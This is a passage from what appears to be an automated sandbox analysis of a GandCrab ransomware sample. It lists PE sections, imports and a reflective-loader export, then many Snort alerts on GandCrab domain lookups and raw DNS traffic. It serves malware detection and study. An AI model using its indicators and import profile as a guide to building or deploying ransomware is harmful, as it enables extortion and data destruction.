IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x1fc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x82e8	0x8400	False	0.4593690814393939	data	6.340223357377212	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xa000	0x70a6	0x7200	False	0.4923245614035088	data	6.181274430024402	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x12000	0xa80	0xc00	False	0.3160807291666667	data	3.1174892908286225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x13000	0x4	0x200	False	0.033203125	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x14000	0x1e0	0x200	False	0.52734375	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x15000	0xac4	0xc00	False	0.7802734375	data	6.4568381269501165	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x14060	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	SetFilePointer, GetFileAttributesW, ReadFile, GetLastError, MoveFileW, lstrcpyW, SetFileAttributesW, CreateMutexW, GetDriveTypeW, VerSetConditionMask, WaitForSingleObject, GetTickCount, InitializeCriticalSection, OpenProcess, GetSystemDirectoryW, TerminateThread, Sleep, TerminateProcess, VerifyVersionInfoW, WaitForMultipleObjects, DeleteCriticalSection, ExpandEnvironmentStringsW, lstrlenW, SetHandleInformation, lstrcatA, MultiByteToWideChar, CreatePipe, lstrcmpiA, Process32NextW, CreateToolhelp32Snapshot, LeaveCriticalSection, EnterCriticalSection, FindFirstFileW, lstrcmpW, FindClose, FindNextFileW, GetNativeSystemInfo, GetComputerNameW, GetDiskFreeSpaceW, GetWindowsDirectoryW, GetVolumeInformationW, LoadLibraryA, lstrcmpiW, VirtualFree, CreateThread, CloseHandle, lstrcatW, CreateFileMappingW, ExitThread, CreateFileW, GetModuleFileNameW, WriteFile, GetModuleHandleW, UnmapViewOfFile, MapViewOfFile, GetFileSize, GetEnvironmentVariableW, lstrcpyA, GetModuleHandleA, VirtualAlloc, GetProcAddress, Process32FirstW, GetTempPathW, GetProcessHeap, HeapFree, HeapAlloc, lstrlenA, CreateProcessW, ExitProcess, IsProcessorFeaturePresent
USER32.dll	BeginPaint, wsprintfW, TranslateMessage, LoadCursorW, LoadIconW, MessageBoxA, GetMessageW, EndPaint, DestroyWindow, RegisterClassExW, ShowWindow, CreateWindowExW, SendMessageW, DispatchMessageW, DefWindowProcW, UpdateWindow, GetForegroundWindow, SetWindowLongW
GDI32.dll	TextOutW
ADVAPI32.dll	FreeSid, RegSetValueExW, RegCreateKeyExW, RegCloseKey, CryptExportKey, CryptAcquireContextW, CryptGetKeyParam, CryptReleaseContext, CryptImportKey, CryptEncrypt, CryptGenKey, CryptDestroyKey, GetUserNameW, RegQueryValueExW, RegOpenKeyExW, AllocateAndInitializeSid
SHELL32.dll	ShellExecuteW, SHGetSpecialFolderPathW, ShellExecuteExW
CRYPT32.dll	CryptStringToBinaryA, CryptBinaryToStringA
WININET.dll	InternetCloseHandle, HttpAddRequestHeadersW, HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetOpenW, InternetReadFile
PSAPI.DLL	EnumDeviceDrivers, GetDeviceDriverBaseNameW

Exports

Name	Ordinal	Address
_ReflectiveLoader@0	1	0x10005ec0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.78.8.8.859550532026737 08/31/22-23:50:37.016810	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59550	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.852106532026737 08/31/22-23:49:25.641298	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52106	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.851142532829498 08/31/22-23:49:32.319799	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51142	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.861174532829498 08/31/22-23:50:40.415440	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61174	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.854194532829498 08/31/22-23:50:17.451854	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54194	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862910532026737 08/31/22-23:50:41.844460	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62910	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.859114532829498 08/31/22-23:50:50.899719	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	59114	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.863192532829498 08/31/22-23:50:10.372925	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	63192	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.858786532026737 08/31/22-23:49:35.365431	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	58786	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.850026532026737 08/31/22-23:49:12.853058	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50026	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.856776532829498 08/31/22-23:50:31.949356	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56776	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.851012532026737 08/31/22-23:49:06.034483	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51012	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862438532026737 08/31/22-23:49:47.214941	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62438	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.860840532829498 08/31/22-23:50:23.078640	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60840	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.864080532829498 08/31/22-23:49:52.783908	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64080	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.861175532829498 08/31/22-23:50:40.433841	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61175	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.858288532829498 08/31/22-23:49:10.646822	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	58288	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.852107532026737 08/31/22-23:49:25.661867	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52107	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.856775532829498 08/31/22-23:50:31.927813	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56775	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862020532026737 08/31/22-23:50:18.955251	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62020	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.858751532829498 08/31/22-23:49:44.095609	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	58751	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.859548532026737 08/31/22-23:50:36.965761	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59548	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.863191532829498 08/31/22-23:50:10.354216	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	63191	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.858750532829498 08/31/22-23:49:44.071935	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	58750	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.853340532829498 08/31/22-23:49:03.740944	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53340	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.851141532829498 08/31/22-23:49:32.298424	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51141	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.863296532026737 08/31/22-23:50:48.003146	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	63296	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.850233532026737 08/31/22-23:49:59.196489	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50233	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862684532829498 08/31/22-23:49:22.306534	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62684	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.861183532026737 08/31/22-23:48:55.804714	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	61183	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.854195532829498 08/31/22-23:50:17.469831	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54195	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.860841532829498 08/31/22-23:50:23.096845	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60841	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862021532026737 08/31/22-23:50:18.975380	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62021	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.855836532026737 08/31/22-23:50:24.524842	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	55836	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.851143532829498 08/31/22-23:49:32.344159	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51143	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.864083532829498 08/31/22-23:49:52.867185	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64083	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.858788532026737 08/31/22-23:49:35.533597	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	58788	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.850509532829498 08/31/22-23:48:51.586247	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	50509	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862436532026737 08/31/22-23:49:47.175608	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62436	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.851440532829498 08/31/22-23:50:03.437869	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51440	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.853640532026737 08/31/22-23:50:13.786207	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53640	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862911532026737 08/31/22-23:50:41.864871	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62911	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.853339532829498 08/31/22-23:49:03.720004	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53339	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862023532026737 08/31/22-23:50:19.013875	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62023	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.855834532026737 08/31/22-23:50:24.482691	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	55834	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.858749532829498 08/31/22-23:49:44.051138	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	58749	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.858286532829498 08/31/22-23:49:10.608212	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	58286	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.851011532026737 08/31/22-23:49:06.014113	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51011	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.851439532829498 08/31/22-23:50:03.414505	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51439	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.859849532829498 08/31/22-23:50:46.658424	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	59849	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.850027532026737 08/31/22-23:49:12.888248	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50027	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.859850532829498 08/31/22-23:50:46.682797	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	59850	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.863294532026737 08/31/22-23:50:47.961479	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	63294	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.859115532829498 08/31/22-23:50:50.920149	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	59115	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862682532829498 08/31/22-23:49:22.268041	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62682	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.859551532026737 08/31/22-23:50:37.037427	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59551	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.850235532026737 08/31/22-23:49:59.234950	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50235	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.861181532026737 08/31/22-23:48:55.077736	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	61181	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862022532026737 08/31/22-23:50:18.995399	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62022	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.853642532026737 08/31/22-23:50:13.835822	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53642	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.850507532829498 08/31/22-23:48:51.544537	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	50507	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.856773532829498 08/31/22-23:50:31.838450	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56773	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.854197532829498 08/31/22-23:50:17.513889	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54197	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.860839532829498 08/31/22-23:50:23.058563	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60839	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.855835532026737 08/31/22-23:50:24.503509	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	55835	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.853338532829498 08/31/22-23:49:03.694333	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53338	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.861177532829498 08/31/22-23:50:40.475632	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61177	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.850510532829498 08/31/22-23:48:51.605938	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	50510	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.853639532026737 08/31/22-23:50:13.763933	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53639	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.858789532026737 08/31/22-23:49:35.553154	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	58789	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.859057532026737 08/31/22-23:50:05.762357	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59057	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862913532026737 08/31/22-23:50:41.903498	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62913	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862435532026737 08/31/22-23:49:47.157448	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62435	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.853341532829498 08/31/22-23:49:03.761474	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53341	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862683532829498 08/31/22-23:49:22.288385	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62683	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.852109532026737 08/31/22-23:49:25.724789	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52109	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.850029532026737 08/31/22-23:49:12.927716	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50029	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.864082532829498 08/31/22-23:49:52.826347	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64082	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.859056532026737 08/31/22-23:50:05.744186	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59056	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.850508532829498 08/31/22-23:48:51.564977	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	50508	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.856774532829498 08/31/22-23:50:31.909568	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56774	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.859117532829498 08/31/22-23:50:50.958695	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	59117	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.864081532829498 08/31/22-23:49:52.807469	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64081	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.852108532026737 08/31/22-23:49:25.704474	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52108	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862437532026737 08/31/22-23:49:47.194217	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62437	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.859116532829498 08/31/22-23:50:50.938342	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	59116	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.859058532026737 08/31/22-23:50:05.782380	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59058	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.859851532829498 08/31/22-23:50:46.705234	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	59851	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.851010532026737 08/31/22-23:49:05.994077	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51010	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862681532829498 08/31/22-23:49:22.247182	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62681	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.851438532829498 08/31/22-23:50:03.395466	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51438	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.862912532026737 08/31/22-23:50:41.885084	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62912	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.850028532026737 08/31/22-23:49:12.908519	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50028	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.859055532026737 08/31/22-23:50:05.722794	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59055	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.853641532026737 08/31/22-23:50:13.814014	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	53641	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.855833532026737 08/31/22-23:50:24.464562	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	55833	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.863293532026737 08/31/22-23:50:47.940116	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	63293	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.850236532026737 08/31/22-23:49:59.285144	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50236	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.858287532829498 08/31/22-23:49:10.628422	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	58287	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.851144532829498 08/31/22-23:49:32.366090	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51144	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.861176532829498 08/31/22-23:50:40.454136	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	61176	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.859848532829498 08/31/22-23:50:46.635471	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	59848	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.861180532026737 08/31/22-23:48:54.987434	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	61180	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.851441532829498 08/31/22-23:50:03.458729	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51441	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.851009532026737 08/31/22-23:49:05.970413	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51009	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.859549532026737 08/31/22-23:50:36.986127	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	59549	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.863295532026737 08/31/22-23:50:47.982626	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	63295	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.850234532026737 08/31/22-23:49:59.216727	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50234	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.861182532026737 08/31/22-23:48:55.097916	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	61182	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.858285532829498 08/31/22-23:49:10.587711	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	58285	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.863189532829498 08/31/22-23:50:10.316381	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	63189	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.858748532829498 08/31/22-23:49:44.032896	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	58748	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.854196532829498 08/31/22-23:50:17.488065	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54196	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.863190532829498 08/31/22-23:50:10.336236	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	63190	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.860842532829498 08/31/22-23:50:23.114941	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60842	53	192.168.2.7	8.8.8.8
192.168.2.78.8.8.858787532026737 08/31/22-23:49:35.450533	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	58787	53	192.168.2.7	8.8.8.8

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 31, 2022 23:48:48.162317038 CEST	56588	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:48.180012941 CEST	53	56588	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:49.311268091 CEST	50835	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:49.340321064 CEST	53	50835	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:49.449572086 CEST	50836	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:49.466823101 CEST	53	50836	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:49.516789913 CEST	50837	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:49.536530972 CEST	53	50837	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:49.537214041 CEST	50838	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:49.556749105 CEST	53	50838	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:49.557590008 CEST	50839	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:49.575861931 CEST	53	50839	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:49.576618910 CEST	50840	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:49.594223022 CEST	53	50840	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:51.461322069 CEST	50505	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:51.490272999 CEST	53	50505	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:51.524420977 CEST	50506	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:51.543720007 CEST	53	50506	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:51.544537067 CEST	50507	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:51.564177990 CEST	53	50507	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:51.564976931 CEST	50508	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:51.584604979 CEST	53	50508	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:51.586246967 CEST	50509	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:51.604727030 CEST	53	50509	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:51.605937958 CEST	50510	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:51.625611067 CEST	53	50510	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:53.572961092 CEST	61178	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:54.615896940 CEST	61178	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:54.773407936 CEST	53	61178	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:54.869833946 CEST	61179	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:54.889055014 CEST	53	61179	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:54.987433910 CEST	61180	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:55.006886005 CEST	53	61180	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:55.077735901 CEST	61181	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:55.097297907 CEST	53	61181	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:55.097915888 CEST	61182	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:55.117695093 CEST	53	61182	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:55.747175932 CEST	53	61178	8.8.8.8	192.168.2.7
Aug 31, 2022 23:48:55.804713964 CEST	61183	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:48:55.824616909 CEST	53	61183	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:00.319737911 CEST	63926	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:01.169933081 CEST	53	63926	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:01.353461027 CEST	63927	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:01.372771025 CEST	53	63927	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:01.374028921 CEST	63928	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:01.391752958 CEST	53	63928	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:01.392597914 CEST	63929	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:01.412412882 CEST	53	63929	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:01.422482967 CEST	63930	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:01.442105055 CEST	53	63930	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:01.442715883 CEST	63931	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:01.462238073 CEST	53	63931	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:03.618457079 CEST	53336	53	192.168.2.7	8.8.8.8
